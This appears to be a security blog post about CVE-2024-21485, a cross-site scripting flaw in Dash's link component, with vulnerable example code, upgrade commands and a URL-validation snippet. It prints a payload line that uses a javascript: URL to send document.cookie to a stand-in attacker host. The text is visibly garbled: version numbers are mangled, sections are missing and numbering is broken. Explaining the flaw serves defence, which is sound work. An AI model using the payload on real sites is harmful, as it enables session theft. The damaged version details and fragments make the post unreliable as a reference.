CVE-2024-21485 - Critical XSS Vulnerability in Dash and dash-core-components

If you use Dash for building data visualizations in Python, there’s an important issue you need to know about: CVE-2024-21485. This vulnerability can give attackers a way to inject malicious JavaScript through simple links—a serious risk for your apps and your users.

This post breaks down what happened, how the exploit works, and what you need to do. If you build web apps with these packages, read on.

What’s Affected?

If you’re using any of the following packages at the listed (or older) versions, your app is vulnerable:

dash-html-components before 2.. and before 2..16

These packages are widely used for building interactive dashboards and analytics apps.

Where’s The Vulnerability?

The vulnerability is a Cross-site Scripting (XSS) flaw. Specifically, if you use the Dash <a> link component, and the href (the URL) of that link can be set by the user, then an attacker could provide a value that makes the browser run their own JavaScript.

Here's a typical Dash component that’s vulnerable

import dash
from dash import html, dcc

app = dash.Dash(__name__)

app.layout = html.Div([
    dcc.Input(id="input-url", placeholder="Enter URL"),
    html.Button("Save", id="save-btn"),
    html.Div(id="output-link"),
])

# Imagine a callback here that saves the input and reloads it for other users:
# (Simplified for demonstration -- unsafe!)

If your app stores or reloads user input from one user and displays it to others, it could be abused.

`

or a more disguised payload, into the input for a link. This uses the javascript: scheme which most browsers will execute as code.

Another user visits that view:

When another user opens the maliciously-crafted page, the browser runs the attacker’s JavaScript. Now the attacker can:

Suppose you allow users to enter links and display them back as clickable <a> tags

user_url = user_input  # Dangerous!

link = html.A("Click me", href=user_url)

If user_url is not properly sanitized, an attacker can set it to

javascript:fetch('https://evil.site/steal?cookie='; + document.cookie)

If another user clicks this, their cookies (including authentication) could be sent to the attacker.

Lateral movement: Access across apps or resources in the same Dash server.

- Compliance risks: Exposing PII (personally identifiable information) could violate laws or contracts.

Note:
> This is only exploitable in Dash apps that store user-provided content (like a personal dashboard, shared view, collaborative notes, etc.) and reload it for others.

But that's a very common pattern in analytics apps!

pip Example

pip install --upgrade dash dash-core-components dash-html-components

2. Validate or Sanitize URLs

Even with the fix, it’s good practice to make sure you never put user input directly in the href field. Always check:

import re

def is_safe_url(url):
    return bool(re.match(r'^https?://', url))

Only allow well-formed URLs that start with http:// or https://.

Original References

- GitHub Security Advisory (GHSA-vjmm-xvx2-pm6r)
- NIST NVD entry for CVE-2024-21485
- Dash changelog

Summary

If your Dash app ever saves views, bookmarks, or links set by one user and shown to another, hurry to update your libraries and check your code!

This is a critical issue that puts your users’ data and accounts at risk. Patch now, and never trust user input—especially in things like URLs.


*Stay safe—keep your analytics apps updated and regularly review inputs from your users!*

If you want more on web vulnerabilities and fixes in Python, follow or bookmark this blog.

Timeline

Published on: 02/02/2024 05:15:09 UTC
Last modified on: 03/06/2024 14:15:47 UTC